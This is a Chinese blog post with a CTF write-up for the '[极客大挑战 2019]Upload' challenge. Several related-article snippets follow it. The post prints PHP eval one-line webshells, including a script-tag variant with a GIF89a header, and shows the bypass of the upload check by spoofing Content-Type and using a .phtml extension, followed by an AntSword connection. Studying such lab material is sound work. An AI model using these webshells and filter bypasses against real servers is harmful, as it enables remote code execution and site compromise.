[极客大挑战 2019]Upload

最新推荐文章于 2024-04-24 19:59:15 发布
最新推荐文章于 2024-04-24 19:59:15 发布
阅读量398 收藏 2
点赞数
文章标签: web upload 安全漏洞
Wuuconix wanna a girlfriend!
本文链接:https://blog.csdn.net/Cypher_X/article/details/114625578
版权

[极客大挑战 2019]Upload

  • 本题考点: php一句话木马的script格式 burpsuite修改文件后缀名和Content-type绕过验证 php可执行文件的不同后缀名 蚁剑连接查看文件

  • 使用工具: burpsuite 蚁剑

  • 主界面提示我们上传一个图片,在上传png等格式后失败,只支持jpg格式的图片

    在这里插入图片描述

    在这里插入图片描述

  • 之后就是写一句话木马了,我们在test.jpg里写上这么一句话,试试看

    <?php eval(@$_POST['shell']);?>

    在这里插入图片描述

  • 看来过滤了<? ,一般服务器也不开短标签,我们可以试试script格式的一句话,结果它说不要骗它,这根本不是图片

    <script language="php"> eval($_POST['shell']); </script>

    在这里插入图片描述

  • 查阅资料后,只要在一句话木马之前添加一个 GIF89a?

    GIF89a?
<script language="php"> eval($_POST['shell']); </script>

  • 成功上传

    在这里插入图片描述

  • 我们试试用蚁剑连接一下,哦,对了,这里的上传目录是/upload/testx.jpg 虽然没有明说,但是一般都是这样的!

    在这里插入图片描述

  • 结果发现不行,原因是因为图片不是php可执行文件。

    在这里插入图片描述

  • 那怎么办呢?只能上传后缀名为jpg格式的文件,但是这样又不能执行一句话木马。我们可以使用burpsuite在上传时修改文件后缀名,绕过前端验证(这里应该是前端吧?),我们现在final.txt里写上之前的一句话木马

    GIF89a?
<script language="php"> eval($_POST['shell']); </script>

  • 拦截后进行修改

    在这里插入图片描述

  • 改为

    Content-Disposition: form-data; name="file"; filename="final.php"
Content-Type: image/jpeg

  • 它提示检测到了php后缀名,看来前端绕过后还有后端后缀名验证

    在这里插入图片描述

  • 查阅资料后,常见的php后缀名绕过方式有 php3 php4 php5 phtml pht 这道题里可以上传phtml

    Content-Disposition: form-data; name="file"; filename="final.phtml"
Content-Type: image/jpeg

    在这里插入图片描述

  • 连接蚁剑后在根目录下成功找到flag

    在这里插入图片描述

  • 参考链接

    [极客大挑战 2019]Upload

    [极客大挑战 2019]Upload 思路

Wuuconix
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2482
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
【BUUCTF]极客挑战 2019Upload1 write up
GZWZ_的博客
04-23 767
文件上传冲啊!!!!!!
极客挑战2019-upload
m0_73303597的博客
12-11 348
自用
[极客挑战 2019]Upload 1
徐海洋
02-02 624
[极客挑战 2019]Upload 1
BUUFCTF—[极客挑战 2019]Upload 1
good good study
05-12 1092
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
[极客挑战 2019]Upload1(详解)
2301_77451464的博客
02-04 747
这句话是不应该出现的,可能是文件名后缀不对,放在蚁剑上,发现不能打开。由此可知,图片是有一个图片头的,可以用010editer打开看一下。文件名demo.php。图片头为GIF89a。
[极客挑战 2019]Upload--BUUCTF
最新发布
XiaoYeZhu_1314的博客
04-24 519
添加头文件:GIF89a改文件格式为image/jpegcheck。
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 4964
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
极客挑战2019Upload解题
Bird&Bird
10-26 3781
1、打开BUUCTF在线评测,选择web---->【极客挑战2019Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?...资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
GeekUniversityWebTask:极客大学前端训练营作业
04-18
【标题】"极客大学前端训练营作业"揭示了这个压缩包内容主要涉及的是极客大学(GeekUniversity)组织的前端开发学习任务。在这个训练营中,学员们可能通过一系列练习和项目来提升自己的前端技能,特别是JavaScript...
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
极客挑战 2019]EasySQL
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值